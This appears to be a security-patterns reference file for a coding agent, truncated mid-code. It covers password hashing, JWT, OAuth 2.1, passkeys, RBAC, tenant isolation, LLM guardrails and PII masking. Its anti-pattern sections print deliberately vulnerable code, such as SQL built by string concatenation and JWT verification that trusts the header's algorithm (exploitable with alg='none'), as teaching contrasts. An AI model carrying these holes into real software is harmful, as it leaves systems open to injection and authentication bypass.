
Security Patterns

Security patterns for authentication, defense-in-depth, input validation, OWASP Top 10, LLM safety, and PII masking. Use when implementing auth flows, security layers, input sanitization, vulnerability prevention, prompt injection defense, or data redaction.

Reference · high

Primary Agent: security-auditor

Security Patterns

Comprehensive security patterns for building hardened applications. Each category has individual rule files in rules/ loaded on-demand.

Quick Reference

| Category | Rules | Impact | When to Use |
| --- | --- | --- | --- |
| Authentication | 3 | CRITICAL | JWT tokens, OAuth 2.1/PKCE, RBAC/permissions |
| Defense-in-Depth | 2 | CRITICAL | Multi-layer security, zero-trust architecture |
| Input Validation | 3 | HIGH | Schema validation (Zod/Pydantic), output encoding, file uploads |
| OWASP Top 10 | 2 | CRITICAL | Injection prevention, broken authentication fixes |
| LLM Safety | 3 | HIGH | Prompt injection defense, output guardrails, content filtering |
| PII Masking | 2 | HIGH | PII detection/redaction with Presidio, Langfuse, LLM Guard |
| Scanning | 3 | HIGH | Dependency audit, SAST (Semgrep/Bandit), secret detection |
| Advanced Guardrails | 2 | CRITICAL | NeMo/Guardrails AI validators, red-teaming, OWASP LLM |

Total: 20 rules across 8 categories

Quick Start

# Argon2id password hashing
from argon2 import PasswordHasher
ph = PasswordHasher()
password_hash = ph.hash(password)
ph.verify(password_hash, password)

# JWT access token (15-min expiry)
import jwt
from datetime import datetime, timedelta, timezone
payload = {
    'sub': user_id, 'type': 'access',
    'exp': datetime.now(timezone.utc) + timedelta(minutes=15),
}
token = jwt.encode(payload, SECRET_KEY, algorithm='HS256')

// Zod v4 schema validation
import { z } from 'zod';
const UserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  role: z.enum(['user', 'admin']).default('user'),
});
const result = UserSchema.safeParse(req.body);

# PII masking with Langfuse
import re
from langfuse import Langfuse

def mask_pii(data, **kwargs):
    if isinstance(data, str):
        data = re.sub(r'\b[\w.-]+@[\w.-]+\.\w+\b', '[REDACTED_EMAIL]', data)
        data = re.sub(r'\b\d{3}-\d{2}-\d{4}\b', '[REDACTED_SSN]', data)
    return data

langfuse = Langfuse(mask=mask_pii)

Authentication

Secure authentication with OAuth 2.1, Passkeys/WebAuthn, JWT tokens, and role-based access control.

| Rule | Description |
| --- | --- |
| auth-jwt.md | JWT creation, verification, expiry, refresh token rotation |
| auth-oauth.md | OAuth 2.1 with PKCE, DPoP, Passkeys/WebAuthn |
| auth-rbac.md | Role-based access control, permission decorators, MFA |

Key Decisions: Argon2id > bcrypt | Access tokens 15 min | PKCE required | Passkeys > TOTP > SMS

Defense-in-Depth

Multi-layer security architecture with no single point of failure.

| Rule | Description |
| --- | --- |
| defense-layers.md | 8-layer security architecture (edge to observability) |
| defense-zero-trust.md | Immutable request context, tenant isolation, audit logging |

Key Decisions: Immutable dataclass context | Query-level tenant filtering | No IDs in LLM prompts

Input Validation

Validate and sanitize all untrusted input using Zod v4 and Pydantic.

| Rule | Description |
| --- | --- |
| validation-input.md | Schema validation with Zod v4 and Pydantic, type coercion |
| validation-output.md | HTML sanitization, output encoding, XSS prevention |
| validation-schemas.md | Discriminated unions, file upload validation, URL allowlists |

Key Decisions: Allowlist over blocklist | Server-side always | Validate magic bytes not extensions
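
To make the magic-byte decision concrete, a minimal sketch (the signature table and helper name are illustrative, not taken from the rule files):

MAGIC_BYTES = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"%PDF-": "application/pdf",
}

def validate_upload(data: bytes, allowed: set[str]) -> str:
    # Sniff the real type from the file's leading bytes, never its extension
    for magic, mime in MAGIC_BYTES.items():
        if data.startswith(magic) and mime in allowed:
            return mime
    raise ValueError("Upload rejected: unrecognized or disallowed file type")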

OWASP Top 10

Protection against the most critical web application security risks.

| Rule | Description |
| --- | --- |
| owasp-injection.md | SQL/command injection, parameterized queries, SSRF prevention |
| owasp-broken-auth.md | JWT algorithm confusion, CSRF protection, timing attacks |

Key Decisions: Parameterized queries only | Hardcode JWT algorithm | SameSite=Strict cookies

LLM Safety

Security patterns for LLM integrations including context separation and output validation.

| Rule | Description |
| --- | --- |
| llm-prompt-injection.md | Context separation, prompt auditing, forbidden patterns |
| llm-guardrails.md | Output validation pipeline: schema, grounding, safety, size |
| llm-content-filtering.md | Pre-LLM filtering, post-LLM attribution, three-phase pattern |

Key Decisions: IDs flow around LLM, never through | Attribution is deterministic | Audit every prompt

PII Masking

PII detection and masking for LLM observability pipelines and logging.

| Rule | Description |
| --- | --- |
| pii-detection.md | Microsoft Presidio, regex patterns, LLM Guard Anonymize |
| pii-redaction.md | Langfuse mask callback, structlog/loguru processors, Vault deanonymization |

Key Decisions: Presidio for enterprise | Replace with type tokens | Use mask callback at init
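
As a taste of the pii-detection rule, a minimal Presidio sketch (entity names are Presidio's built-in recognizers; the helper name is illustrative):

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def redact(text: str) -> str:
    findings = analyzer.analyze(text=text, entities=["EMAIL_ADDRESS", "US_SSN"], language="en")
    # With no operators specified, Presidio replaces each span with its entity
    # type token, e.g. <EMAIL_ADDRESS>, matching the key decision above.
    result = anonymizer.anonymize(text=text, analyzer_results=findings)
    return result.text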

Scanning

Automated security scanning for dependencies, code, and secrets.

| Rule | Description |
| --- | --- |
| scanning-dependency.md | npm audit, pip-audit, Trivy container scanning, CI gating |
| scanning-sast.md | Semgrep and Bandit static analysis, custom rules, pre-commit |
| scanning-secrets.md | Gitleaks, TruffleHog, detect-secrets with baseline management |

Key Decisions: Pre-commit hooks for shift-left | Block on critical/high | Gitleaks + detect-secrets baseline
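
A hedged sketch of the CI-gating decision: rather than parsing reports, fail the build on the scanner's exit code (pip-audit exits non-zero when it finds vulnerabilities; the function name is illustrative):

import subprocess
import sys

def audit_gate() -> None:
    # pip-audit exits non-zero when it finds vulnerabilities (or fails to run)
    proc = subprocess.run(["pip-audit"], capture_output=True, text=True)
    if proc.returncode != 0:
        sys.stdout.write(proc.stdout)
        sys.stderr.write(proc.stderr)
        sys.exit(1)  # fail the CI job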

Advanced Guardrails

Production LLM safety with NeMo Guardrails, Guardrails AI validators, and DeepTeam red-teaming.

| Rule | Description |
| --- | --- |
| guardrails-nemo.md | NeMo Guardrails, Colang 2.0 flows, Guardrails AI validators, layered validation |
| guardrails-llm-validation.md | DeepTeam red-teaming (40+ vulnerabilities), OWASP LLM Top 10 compliance |

Key Decisions: NeMo for flows, Guardrails AI for validators | Toxicity 0.5 threshold | Red-team pre-release + quarterly

Managed Hook Hierarchy (CC 2.1.49)

Plugin settings follow a 3-tier precedence:

| Tier | Source | Overridable? |
| --- | --- | --- |
| 1. Managed (plugin settings.json) | Plugin author ships defaults | Yes, by user |
| 2. Project (.claude/settings.json) | Repository config | Yes, by user |
| 3. User (~/.claude/settings.json) | Personal preferences | Final authority |

Security hooks shipped by OrchestKit are managed defaults — users can disable them but are warned. Enterprise admins can lock settings via managed profiles.
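
Read the table as "later tiers win". A purely illustrative sketch of the merge logic (Claude Code resolves this internally; nothing below is its actual API):

def resolve_setting(key, managed: dict, project: dict, user: dict):
    # Highest-precedence tier first: user settings are the final authority.
    for scope in (user, project, managed):
        if key in scope:
            return scope[key]
    return None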

Anti-Patterns (FORBIDDEN)

# Authentication
user.password = request.form['password']       # Plaintext password storage
response_type=token                             # Implicit OAuth grant (removed in OAuth 2.1)
return "Email not found"                        # Information disclosure

# Input Validation
"SELECT * FROM users WHERE name = '" + name + "'"  # SQL injection
if (file.type === 'image/png') {...}               # Trusting Content-Type header

# LLM Safety
prompt = f"Analyze for user {user_id}"             # ID in prompt
artifact.user_id = llm_output["user_id"]           # Trusting LLM-generated IDs

# PII
logger.info(f"User email: {user.email}")           # Raw PII in logs
langfuse.trace(input=raw_prompt)                   # Unmasked observability data

Detailed Documentation

| Resource | Description |
| --- | --- |
| references/oauth-2.1-passkeys.md | OAuth 2.1, PKCE, DPoP, Passkeys/WebAuthn |
| references/request-context-pattern.md | Immutable request context for identity flow |
| references/tenant-isolation.md | Tenant-scoped repository, vector/full-text search |
| references/audit-logging.md | Sanitized structured logging, compliance |
| references/zod-v4-api.md | Zod v4 types, coercion, transforms, refinements |
| references/vulnerability-demos.md | OWASP vulnerable vs secure code examples |
| references/context-separation.md | LLM context separation architecture |
| references/output-guardrails.md | Output validation pipeline implementation |
| references/pre-llm-filtering.md | Tenant-scoped retrieval, content extraction |
| references/post-llm-attribution.md | Deterministic attribution pattern |
| references/prompt-audit.md | Prompt audit patterns, safe prompt builder |
| references/presidio-integration.md | Microsoft Presidio setup, custom recognizers |
| references/langfuse-mask-callback.md | Langfuse SDK mask implementation |
| references/llm-guard-sanitization.md | LLM Guard Anonymize/Deanonymize with Vault |
| references/logging-redaction.md | structlog/loguru pre-logging redaction |
Related Skills

  • api-design-framework - API security patterns
  • ork:rag-retrieval - RAG pipeline patterns requiring tenant-scoped retrieval
  • llm-evaluation - Output quality assessment including hallucination detection

Capability Details

authentication

Keywords: password, hashing, JWT, token, OAuth, PKCE, passkey, WebAuthn, RBAC, session

Solves:

  • Implement secure authentication with modern standards
  • JWT token management with proper expiry
  • OAuth 2.1 with PKCE flow
  • Passkeys/WebAuthn registration and login
  • Role-based access control

defense-in-depth

Keywords: defense in depth, security layers, multi-layer, request context, tenant isolation

Solves:

  • How to secure AI applications end-to-end
  • Implement 8-layer security architecture
  • Create immutable request context
  • Ensure tenant isolation at query level

input-validation

Keywords: schema, validate, Zod, Pydantic, sanitize, HTML, XSS, file upload

Solves:

  • Validate input against schemas (Zod v4, Pydantic)
  • Prevent injection attacks with allowlists
  • Sanitize HTML and prevent XSS
  • Validate file uploads by magic bytes

owasp-top-10

Keywords: OWASP, sql injection, broken access control, CSRF, XSS, SSRF

Solves:

  • Fix OWASP Top 10 vulnerabilities
  • Prevent SQL and command injection
  • Implement CSRF protection
  • Fix broken authentication

llm-safety

Keywords: prompt injection, context separation, guardrails, hallucination, LLM output

Solves:

  • Prevent prompt injection attacks
  • Implement context separation (IDs around LLM)
  • Validate LLM output with guardrail pipeline
  • Deterministic post-LLM attribution

pii-masking

Keywords: PII, masking, Presidio, Langfuse, redact, GDPR, privacy

Solves:

  • Detect and mask PII in LLM pipelines
  • Integrate masking with Langfuse observability
  • Implement pre-logging redaction
  • GDPR-compliant data handling

Rules (18)

Auth: JWT Tokens & Password Hashing — CRITICAL

JWT Tokens & Password Hashing

Password Hashing (Argon2id)

from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError

ph = PasswordHasher(
    time_cost=3,        # Number of iterations
    memory_cost=65536,  # 64 MB
    parallelism=4,      # Number of threads
)

def hash_password(password: str) -> str:
    return ph.hash(password)

def verify_password(password_hash: str, password: str) -> bool:
    try:
        ph.verify(password_hash, password)
        return True
    except VerifyMismatchError:
        return False

def needs_rehash(password_hash: str) -> bool:
    return ph.check_needs_rehash(password_hash)
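
A natural place to call needs_rehash() is right after a successful login, so stored hashes upgrade transparently when the cost parameters above change:

# On successful login, transparently upgrade hashes when parameters change
if verify_password(user.password_hash, password):
    if needs_rehash(user.password_hash):
        user.password_hash = hash_password(password)  # re-hash with current params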

JWT Access Token

import os
import jwt
from datetime import datetime, timedelta, timezone

SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15

def create_access_token(user_id: str, roles: list[str] | None = None) -> str:
    now = datetime.now(timezone.utc)
    payload = {
        "sub": user_id,
        "type": "access",
        "roles": roles or [],
        "iat": now,
        "exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
    }
    return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)

def verify_access_token(token: str) -> dict | None:
    try:
        payload = jwt.decode(
            token, SECRET_KEY,
            algorithms=[ALGORITHM],  # NEVER read from header
            options={'require': ['exp', 'iat', 'sub']},
        )
        if payload.get("type") != "access":
            return None
        return payload
    except jwt.ExpiredSignatureError:
        return None
    except jwt.InvalidTokenError:
        return None

Token Expiry Guidelines

| Token Type | Expiry | Storage |
| --- | --- | --- |
| Access | 15 min - 1 hour | Memory only |
| Refresh | 7-30 days | HTTPOnly cookie |

Refresh Token Rotation

import hashlib
import secrets
from datetime import datetime, timedelta, timezone
from jwt import InvalidTokenError

def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
    old_hash = hashlib.sha256(old_token.encode()).hexdigest()

    token_record = db.query("""
        SELECT user_id, version FROM refresh_tokens
        WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
    """, [old_hash]).fetchone()

    if not token_record:
        raise InvalidTokenError("Refresh token invalid or expired")

    user_id, version = token_record

    # Revoke old token
    db.execute("UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?", [old_hash])

    # Create new tokens
    new_access_token = create_access_token(user_id)
    new_refresh_token = secrets.token_urlsafe(32)
    new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()

    db.execute("""
        INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
        VALUES (?, ?, ?, ?)
    """, [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])

    return new_access_token, new_refresh_token

Session Security

app.config['SESSION_COOKIE_SECURE'] = True      # HTTPS only
app.config['SESSION_COOKIE_HTTPONLY'] = True    # No JS access
app.config['SESSION_COOKIE_SAMESITE'] = 'Strict'

Anti-Patterns

# NEVER store passwords in plaintext
user.password = request.form['password']

# NEVER trust algorithm from JWT header
payload = jwt.decode(token, SECRET, algorithms=jwt.get_unverified_header(token)['alg'])

# NEVER reveal if email exists
return "Email not found"  # Information disclosure

# ALWAYS use Argon2id or bcrypt
password_hash = ph.hash(password)

# ALWAYS hardcode algorithm
payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])

# ALWAYS use generic error messages
return "Invalid credentials"

Incorrect — Algorithm confusion vulnerability allows "none" algorithm attack:

# Reading algorithm from untrusted JWT header
header = jwt.get_unverified_header(token)
payload = jwt.decode(token, SECRET_KEY, algorithms=[header['alg']])
# Attacker can set alg="none" to bypass signature verification

Correct — Hardcode expected algorithm to prevent confusion attacks:

# Always specify the expected algorithm explicitly
payload = jwt.decode(
    token, SECRET_KEY,
    algorithms=['HS256'],  # Never read from header
    options={'require': ['exp', 'iat', 'sub']},
)

Implement OAuth 2.1 with mandatory PKCE, token rotation, and phishing-resistant passkeys — CRITICAL

OAuth 2.1 & Passkeys/WebAuthn

OAuth 2.1 Key Changes

  • PKCE required for ALL clients (not just public)
  • Implicit grant removed (security vulnerability)
  • Password grant removed (credential anti-pattern)
  • Refresh token rotation mandatory

PKCE Flow (Required)

import base64
import hashlib
import secrets
from urllib.parse import urlencode

import requests

def generate_pkce_pair():
    code_verifier = secrets.token_urlsafe(64)
    digest = hashlib.sha256(code_verifier.encode()).digest()
    code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
    return code_verifier, code_challenge

verifier, challenge = generate_pkce_pair()

# Step 1: Authorization request
auth_url = f"""https://auth.example.com/authorize?
    response_type=code
    &client_id={client_id}
    &redirect_uri={redirect_uri}
    &code_challenge={challenge}
    &code_challenge_method=S256
    &state={state}
    &scope=openid profile"""

# Step 2: Exchange code for tokens
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "code_verifier": verifier,
    }
)

DPoP (Demonstrating Proof of Possession)

import json
import time
import uuid

import jwt

def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
    claims = {
        "jti": str(uuid.uuid4()),
        "htm": http_method,
        "htu": http_uri,
        "iat": int(time.time()),
    }
    headers = {
        "typ": "dpop+jwt",
        "alg": "ES256",
        # Public key as a JWK dict (PyJWT helper; key objects come from `cryptography`)
        "jwk": json.loads(jwt.algorithms.ECAlgorithm.to_jwk(private_key.public_key())),
    }
    return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)

Passkeys/WebAuthn Registration

from webauthn import generate_registration_options, verify_registration_response
from webauthn.helpers.structs import (
    AuthenticatorSelectionCriteria,
    ResidentKeyRequirement,
    UserVerificationRequirement,
)

options = generate_registration_options(
    rp_id="example.com",
    rp_name="Example App",
    user_id=user.id.encode(),
    user_name=user.email,
    authenticator_selection=AuthenticatorSelectionCriteria(
        resident_key=ResidentKeyRequirement.REQUIRED,
        user_verification=UserVerificationRequirement.REQUIRED,
    ),
)

Passkeys Authentication

from webauthn import generate_authentication_options, verify_authentication_response

options = generate_authentication_options(
    rp_id="example.com",
    allow_credentials=[
        {"id": cred.credential_id, "type": "public-key"}
        for cred in user.credentials
    ],
)

verification = verify_authentication_response(
    credential=client_response,
    expected_challenge=stored_challenge,
    expected_rp_id="example.com",
    expected_origin="https://example.com",
    credential_public_key=stored_credential.public_key,
    credential_current_sign_count=stored_credential.sign_count,
)

# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count

Frontend Passkey Implementation

// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
  const credential = await navigator.credentials.create({ publicKey: options });
  await fetch('/api/auth/passkey/register', {
    method: 'POST', body: JSON.stringify(credential),
  });
}

// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
  const available = await PublicKeyCredential.isConditionalMediationAvailable();
  if (available) {
    const credential = await navigator.credentials.get({
      publicKey: options, mediation: 'conditional',
    });
  }
}

Anti-Patterns

# NEVER use implicit OAuth grant
response_type=token  # Removed in OAuth 2.1

# NEVER skip PKCE
# PKCE is required for ALL clients in OAuth 2.1

# ALWAYS use PKCE with S256
code_challenge=challenge&code_challenge_method=S256

Incorrect — OAuth 2.0 token exchange without PKCE is vulnerable to interception:

# No PKCE verification
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "client_id": client_id,
    }
)

Correct — OAuth 2.1 requires PKCE for all clients to prevent code interception:

# Generate and verify PKCE challenge
verifier, challenge = generate_pkce_pair()
token_response = requests.post(
    "https://auth.example.com/token",
    data={
        "grant_type": "authorization_code",
        "code": auth_code,
        "client_id": client_id,
        "code_verifier": verifier,  # Proves client possession
    }
)

Enforce role-based access control with multi-factor authentication and rate limiting — CRITICAL

Role-Based Access Control & Multi-Factor Authentication

Role-Based Access Control

from functools import wraps
from flask import abort, g

def require_role(*roles):
    """Decorator to require specific role(s)."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not any(role in g.current_user.roles for role in roles):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

def require_permission(permission: str):
    """Decorator to require specific permission."""
    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            if not g.current_user:
                abort(401)
            if not g.current_user.has_permission(permission):
                abort(403)
            return f(*args, **kwargs)
        return wrapper
    return decorator

# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
    return get_all_users()

@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
    return get_patient_by_id(id)

FastAPI RBAC

from fastapi import Depends, HTTPException, status
from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials

security = HTTPBearer()

async def get_current_user(
    credentials: HTTPAuthorizationCredentials = Depends(security)
):
    payload = verify_access_token(credentials.credentials)
    if not payload:
        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
    user = await get_user_by_id(payload["sub"])
    if not user:
        raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED)
    return user

def require_role(*roles):
    async def role_checker(user = Depends(get_current_user)):
        if not any(role in user.roles for role in roles):
            raise HTTPException(status_code=status.HTTP_403_FORBIDDEN)
        return user
    return role_checker

Multi-Factor Authentication (TOTP)

import pyotp
import qrcode
from io import BytesIO
import base64

def generate_totp_secret() -> str:
    return pyotp.random_base32()

def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
    totp = pyotp.TOTP(secret)
    return totp.provisioning_uri(name=email, issuer_name=issuer)

def verify_totp(secret: str, code: str) -> bool:
    totp = pyotp.TOTP(secret)
    return totp.verify(code, valid_window=1)
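
The qrcode, BytesIO, and base64 imports above can serve the enrollment UI. A small sketch (helper name is illustrative) that renders the provisioning URI as an inline QR image:

def totp_qr_data_uri(secret: str, email: str) -> str:
    """Render the provisioning URI as a base64 data URI for an <img> tag."""
    img = qrcode.make(get_totp_provisioning_uri(secret, email))
    buf = BytesIO()
    img.save(buf, format="PNG")
    return "data:image/png;base64," + base64.b64encode(buf.getvalue()).decode()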

Complete Login Flow with MFA

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
    email = request.json.get('email')
    password = request.json.get('password')

    user = User.query.filter_by(email=email).first()

    # Don't reveal if user exists
    if not user or not verify_password(user.password_hash, password):
        return {"error": "Invalid credentials"}, 401

    if user.mfa_enabled:
        mfa_token = create_mfa_pending_token(user.id)
        return {"mfa_required": True, "mfa_token": mfa_token}

    return issue_tokens(user)

Rate Limiting

| Endpoint | Limit |
| --- | --- |
| Login | 5 per minute |
| Password reset | 3 per hour |
| MFA verify | 5 per minute |
| Registration | 10 per hour |
| API general | 100 per minute |

from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(get_remote_address, app=app,
    default_limits=["200 per day", "50 per hour"],
    storage_uri="redis://localhost:6379")

@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
    pass

@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour")
def password_reset():
    return {"message": "If email exists, reset link sent"}

Key Decisions

| Decision | Recommendation |
| --- | --- |
| MFA method | Passkeys > TOTP > SMS |
| Rate limit | 5 attempts per minute |
| Error messages | Generic "Invalid credentials" |
| Account lockout | After 10 failed attempts |
| Backup codes | 10 one-time use codes |
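
The lockout decision above can be enforced with a failed-attempt counter. A hypothetical sketch assuming a redis-py client r:

# Hypothetical: count failed logins per account; lock after 10 in a 15-min window
def record_failed_login(r, email: str) -> bool:
    key = f"lockout:{email.lower()}"
    attempts = r.incr(key)   # atomic increment per account
    if attempts == 1:
        r.expire(key, 900)   # start the 15-minute window on first failure
    return attempts >= 10    # True: the account is now locked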

Incorrect — Direct role checks in routes leak role information to the caller:

@app.route('/admin/users')
def admin_users():
    if 'admin' not in current_user.roles:
        return {"error": "You are not an admin"}, 403  # Reveals role info
    return get_all_users()

Correct — Generic error messages and proper RBAC decorator prevent enumeration:

@app.route('/admin/users')
@require_role('admin')
def admin_users():
    return get_all_users()
# Returns 403 Forbidden with no role details exposed

Design defense-in-depth with eight security layers from edge protection to observability — CRITICAL

8-Layer Security Architecture

Overview

Defense in depth applies multiple security layers so that if one fails, others still protect the system.

Core Principle: No single security control should be the only thing protecting sensitive operations.

The Architecture

Layer 0: EDGE           | WAF, Rate Limiting, DDoS, Bot Detection
Layer 1: GATEWAY        | JWT Verify, Extract Claims, Build Context
Layer 2: INPUT          | Schema Validation, PII Detection, Injection Defense
Layer 3: AUTHORIZATION  | RBAC/ABAC, Tenant Check, Resource Access
Layer 4: DATA ACCESS    | Parameterized Queries, Tenant Filter
Layer 5: LLM            | Prompt Building (no IDs), Context Separation
Layer 6: OUTPUT         | Schema Validation, Guardrails, Hallucination Check
Layer 7: STORAGE        | Attribution, Audit Trail, Encryption
Layer 8: OBSERVABILITY  | Logging (sanitized), Tracing, Metrics

Layer Details

Layer 0: Edge Protection

  • WAF rules for OWASP Top 10
  • Rate limiting per user/IP
  • DDoS protection
  • Bot detection and geo-blocking

Layer 1: Gateway / Authentication

@dataclass(frozen=True)
class RequestContext:
    """Immutable context that flows through the system"""
    user_id: UUID
    tenant_id: UUID
    session_id: str
    permissions: frozenset[str]
    request_id: str
    trace_id: str
    timestamp: datetime
    client_ip: str

Layer 2: Input Validation

  • Schema validation: Pydantic/Zod for structure
  • Content validation: PII detection, malware scan
  • Injection defense: SQL, XSS, prompt injection patterns

Layer 3: Authorization

async def authorize(ctx: RequestContext, action: str, resource: Resource) -> bool:
    if action not in ctx.permissions:
        raise Forbidden("Missing permission")
    if resource.tenant_id != ctx.tenant_id:
        raise Forbidden("Cross-tenant access denied")
    if not await check_resource_access(ctx.user_id, resource):
        raise Forbidden("No access to resource")
    return True

Layer 4: Data Access

class TenantScopedRepository:
    def __init__(self, ctx: RequestContext):
        self.ctx = ctx
        self._base_filter = {"tenant_id": ctx.tenant_id}

    async def find(self, query: dict) -> list[Model]:
        safe_query = {**self._base_filter, **query}
        return await self.db.find(safe_query)

Layer 5: LLM Orchestration

  • Identifiers flow AROUND the LLM, not THROUGH it
  • Prompts contain only content text
  • No user_id, tenant_id, document_id in prompt text

Layer 6: Output Validation

  • Schema validation (JSON structure)
  • Content guardrails (toxicity, PII generation)
  • Hallucination detection (grounding check)

Layer 7: Attribution & Storage

  • Attribution is deterministic, not LLM-generated
  • Context from Layer 1 is attached to results
  • Audit trail recorded

Layer 8: Observability

  • Structured logging with sanitization
  • Distributed tracing (Langfuse)
  • Metrics (latency, errors, costs)

Implementation Checklist

  • Layer 0: Rate limiting configured
  • Layer 1: JWT validation active, RequestContext created
  • Layer 2: Pydantic models validate all input
  • Layer 3: Authorization check on every endpoint
  • Layer 4: All queries include tenant_id filter
  • Layer 5: No IDs in LLM prompts (run audit)
  • Layer 6: Output schema validation active
  • Layer 7: Attribution uses context, not LLM output
  • Layer 8: Logging sanitized, tracing enabled

Industry Sources

| Pattern | Source | Application |
| --- | --- | --- |
| Defense in Depth | NIST | Multiple validation layers |
| Zero Trust | Google BeyondCorp | Every request verified |
| Least Privilege | AWS IAM | Minimal permissions |
| Complete Mediation | Saltzer & Schroeder | Every access checked |

Incorrect — Single-layer auth check is vulnerable if JWT verification is bypassed:

@app.get("/documents/{doc_id}")
def get_document(doc_id: UUID, token: str = Header(...)):
    claims = verify_jwt(token)  # Only layer
    return db.query(Document).get(doc_id)

Correct — Multi-layer defense verifies auth, validates input, checks authorization, and filters data:

@app.get("/documents/{doc_id}")
async def get_document(doc_id: UUID, ctx: RequestContext = Depends(get_context)):
    # Layer 1: Gateway verified JWT
    # Layer 2: UUID validation (Pydantic)
    # Layer 3: Authorization
    await authorize(ctx, "documents:read", doc_id)
    # Layer 4: Tenant-scoped query
    repo = TenantScopedRepository(db, ctx, Document)
    return await repo.find_by_id(doc_id)

Defense: Zero Trust & Tenant Isolation — CRITICAL

Zero Trust & Tenant Isolation

Immutable Request Context

from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet

@dataclass(frozen=True)
class RequestContext:
    """
    System context that NEVER appears in LLM prompts.
    Created at gateway, flows through all layers.
    """
    # Identity
    user_id: UUID
    tenant_id: UUID
    session_id: str
    permissions: FrozenSet[str]

    # Tracing
    request_id: str
    trace_id: str
    span_id: str

    # Resource
    resource_id: UUID | None = None
    resource_type: str | None = None

    # Metadata
    timestamp: datetime | None = None
    client_ip: str = ""

Context Creation at Gateway

from uuid import UUID, uuid4

from fastapi import Depends, HTTPException, Request

async def get_request_context(request: Request) -> RequestContext:
    auth_header = request.headers.get("Authorization", "")
    if not auth_header.startswith("Bearer "):
        raise HTTPException(401, "Missing authorization")

    token = auth_header[7:]
    claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])

    return RequestContext(
        user_id=UUID(claims["sub"]),
        tenant_id=UUID(claims["tenant_id"]),
        session_id=claims["session_id"],
        permissions=frozenset(claims.get("permissions", [])),
        request_id=request.headers.get("X-Request-ID", str(uuid4())),
        trace_id=generate_trace_id(),
        span_id=generate_span_id(),
        client_ip=request.client.host,
    )

Tenant-Scoped Repository

from typing import Generic, TypeVar

from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession

T = TypeVar("T")

class TenantScopedRepository(Generic[T]):
    """Cannot be bypassed - tenant filter is mandatory."""

    def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
        self.session = session
        self.ctx = ctx
        self.model = model

    def _base_query(self):
        return select(self.model).where(
            self.model.tenant_id == self.ctx.tenant_id
        )

    async def find_by_id(self, id: UUID) -> T | None:
        """Even by-ID lookup includes tenant check."""
        query = self._base_query().where(self.model.id == id)
        result = await self.session.execute(query)
        return result.scalar_one_or_none()

    async def find_by_user(self) -> list[T]:
        query = self._base_query().where(
            self.model.user_id == self.ctx.user_id
        )
        result = await self.session.execute(query)
        return result.scalars().all()

Vector Search with Tenant Isolation

async def semantic_search(query_embedding: list[float], ctx: RequestContext, limit: int = 10):
    return await db.execute("""
        SELECT id, content, 1 - (embedding <-> :query) as similarity
        FROM documents
        WHERE tenant_id = :tenant_id
          AND user_id = :user_id
          AND embedding <-> :query < 0.5
        ORDER BY embedding <-> :query
        LIMIT :limit
    """, {
        "tenant_id": ctx.tenant_id,
        "user_id": ctx.user_id,
        "query": query_embedding,
        "limit": limit,
    })

Caching with Tenant Isolation

def cache_key(ctx: RequestContext, operation: str, *args) -> str:
    """Cache keys MUST include tenant_id."""
    return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"

Row-Level Security (PostgreSQL)

ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

CREATE POLICY tenant_isolation ON documents
    USING (tenant_id = current_setting('app.tenant_id')::uuid);

SET app.tenant_id = 'tenant-uuid-here';
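
For the policy to apply from application code, the GUC must be set per transaction. A sketch using a SQLAlchemy async session (session wiring assumed):

from sqlalchemy import text

async def bind_tenant(session, ctx) -> None:
    # set_config(..., true) scopes the value to the current transaction,
    # so the policy above sees the correct tenant for every query in it.
    await session.execute(
        text("SELECT set_config('app.tenant_id', :tid, true)"),
        {"tid": str(ctx.tenant_id)},
    )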

Audit Logging

class SanitizedLogger:
    REDACT_PATTERNS = {
        r"password": "[PASSWORD_REDACTED]",
